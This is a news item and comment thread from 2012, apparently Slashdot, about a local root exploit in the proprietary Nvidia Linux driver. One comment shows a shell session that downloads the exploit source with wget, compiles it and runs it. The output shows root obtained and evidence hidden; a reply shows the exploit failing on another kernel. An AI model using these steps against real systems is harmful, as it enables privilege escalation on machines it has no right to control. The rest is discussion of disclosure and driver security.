Proprietary Nvidia Linux Driver Contains Privilege Escalation Hole

An anonymous reader writes "The Nvidia binary driver has been exploited by an anonymous hacker, who reported it to nvidia months ago and it was never fixed. Now the exploit was made public." The one releasing the exploit (relayed to him anonymously) is David Arlie, well known X hacker. The bug lets the attacker write to any part of memory on the system by shifting the VGA window; the attached exploit uses this to attain superuser privileges. It appears that this has been known to Nvidia for at least a month.

Use Windows | +5 Insightful

[h910]

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Re:Use Windows | +5 Insightful

[broginator]

That's like saying "Drive Fords, that way you won't crash in a Chevy."

Re:Use Windows | +5 Insightful

[Tapewolf]

Use Windows and you don't get linux malware. True story, mod +5 true accordingly.

Since Nvidia's drivers share a large amount of common code, I'd say it's only a matter of time.

Hoooo boy...

[Tarlus]

With all the recent controversy and Linus and other members of the FOSS community flipping Nvidia the bird over the issue of keeping their driver closed, they're certainly going to take this news and run with it.

Re:Hoooo boy...

Correct. That's why i choose AMD.

Not that they're that much better, but at least they tried to.

Open Source Advantage

[Nerdfest]

I'd like to say that this would not have happened with an open source driver, but that's not necessarily true. It would almost definitely have been patched by now though.

Re:Open Source Advantage

[Dagger2]

Clearly the proprietary driver is much better then, since it allows me to do whatever I like with your computer.

Re:A view to a kill.

[greg1104]

VGA maps the video card's memory into the regular CPU address space so that applications can read and write directly to it. That's the VGA window being referenced here. Removing that is further complicated by waiting to retain compatibility with older video standards (CGA, EGA).

Re:Who did he send it to at Nvidia?

Maybe people need to stop being apologists for this kind of thing...

Companies don't just hand out the email address for the head of their SW development division; maybe if they did we could them let the right people know. I emailed a random Joe when I found an issue with a site, and it got escalated up and it got fixed.

Maybe if Nvidia had better quality random Joe's, when this sort of stuff did pass by them it would get escalated and not deleted.

works here

It's certainly legit..

c@v:~$
c@v:~$ wget http://cache.gmane.org//gmane/comp/security/full-disclosure/86747-001.bin ...
2012-08-01 12:46:13 (60.8 KB/s) - `86747-001.bin' saved [18225/18225] ...
c@v:~$ mv 86747-001.bin nvid-root.c
c@v:~$ gcc nvid-root.c -o nvid-root
c@v:~$ ./nvid-root
[*] IDT offset at 0xc1808000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 32-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xc18086e0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
[*] Have root, will travel..
sh-4.2#
sh-4.2#

sh-4.2# id
uid=0(root) gid=0(root) groups=0(root),4(adm),6(disk),20(dialout),24(cdrom),29(audio),44(video),46(plugdev),104(fuse),105(lpadmin),115(admin),116(sambashare),119(pulse-access),1000(chad)
sh-4.2#

sh-4.2# lsb_release -a
LSB Version: core-2.0-ia32:core-2.0-noarch:core-3.0-ia32:core-3.0-noarch:core-3.1-ia32:core-3.1-noarch:core-3.2-ia32:core-3.2-noarch:core-4.0-ia32:core-4.0-noarch
Distributor ID: Ubuntu
Description: Ubuntu 12.04 LTS
Release: 12.04
Codename: precise

sh-4.2# uname -a
Linux vero 3.2.0-24-generic-pae #39-Ubuntu SMP Mon May 21 18:54:21 UTC 2012 i686 i686 i386 GNU/Linux
sh-4.2#

Re:works here

[dmitrygr]

64-bit 2.6.38.8 kernel with nvidia driver 280.13 doesn't work:

[*] IDT offset at 0xffffffff81b60000
[*] Abusing nVidia...
[*] CVE-2012-YYYY
[*] 64-bits Kernel found at ofs 0
[*] Using IDT entry: 220 (0xffffffff81b60dc0)
[*] Enhancing gate entry...
[*] Triggering payload...
[*] Hiding evidence...
callsetroot returned fffffffffffffffe (-2)
[*] Failed to get root.

Re:Who did he send it to at Nvidia?

[nedlohs]

Yeah you don't get more flimsy evidence than a working exploit.

Re:Who did he send it to at Nvidia?

[ZeroSumHappiness]

If you're not surprised then I hope it's because you expect Nvidia to be shite. Microsoft, as policy (though possibly not practice), fully evaluates any possible security exploits submitted because they assume that among the cranks who've already broken through the airlock there might be a real security exploit. This is expensive but necessary. If Nvidia can't do the same then I'll have to seriously consider my choices next time I'm buying a card.

meh

[ThorGod]

Not too long ago Intel had a firmware exploit in their processors.

I still appreciate the effort Nvidia's made to support their cards on OSes such as linux and BSD over the years. I'll still only EVER buy nvidia cards because of their driver support.

Here's hoping they keep trucking along at it, even with what Linus' said and now this.

For limited values of "you"

It needs a local execution method (either another exploit or a tricked user) and access to /dev/nvidia0.

So, for example, even if you exploit a web service to execute this on a suitable machine, you still won't get anything as long as web service's user doesn't have permissions on /dev/nvidia0.

Worst of all, it still needs downloading and compiling sources. WTF, Linux? When are we going to get all the software available prepackaged and regularly updated from the repository? Other OSes handle it well, no need for "wget && patch && gcc" to get this working, no need for sudo and sometimes even no need for any actions from user AT ALL, simply visit a page and it just works!

Re:For limited values of "you"

[Nerdfest]

When are we going to get all the software available prepackaged and regularly updated from the repository?

That's a fairly half-hearted troll. Most Linux distros have package management and multi-source software repositories that make iOS, Metro, and OS X look like the limited attempts at platform lock-in that they really are.

One of many

[jandrese]

The graphics driver is both monstrously large and operates at a very low level, there are going to be tons and tons of security problems with it when people start seriously looking at it. As John Carmak put it: I agree with Microsoft’s assessment that WebGL is a severe security risk. The gfx driver culture is not the culture of security.

Re:Nvidia rotten to the core

[Jerry+Atrick]

Frankly a root exploit is one of their lesser sins.

Then their cardinal sins must be Hitlerian; (from David Arlie's write-up)

You forget the episodes like their broken hardware accelerated NIC, that dropped random bits.

First the spent months claiming there was no bug.
Then they spent months claiming they'd fixed it (they hadn't).
Then they claimed they'd fixed it when they'd actually just disabled the acceleration and fallen back to software!

Over a year of data loss for anyone that believed them.

Same thing happened with their attempt at accelerated sound hardware. And pretty much everything else they've tried accelerating apart from GPUs. GPUs have a whole different class of problems to do with not listening to feedback.

Re:Nvidia rotten to the core

[fuzzyfuzzyfungus]

Somebody should probably tell Nvidia that a driver that enables arbitrary memory read/write could probably be used as a DRM circumvention mechanism if targeted at a 'protected' program rather than the kernel. That might actually get them to fix it...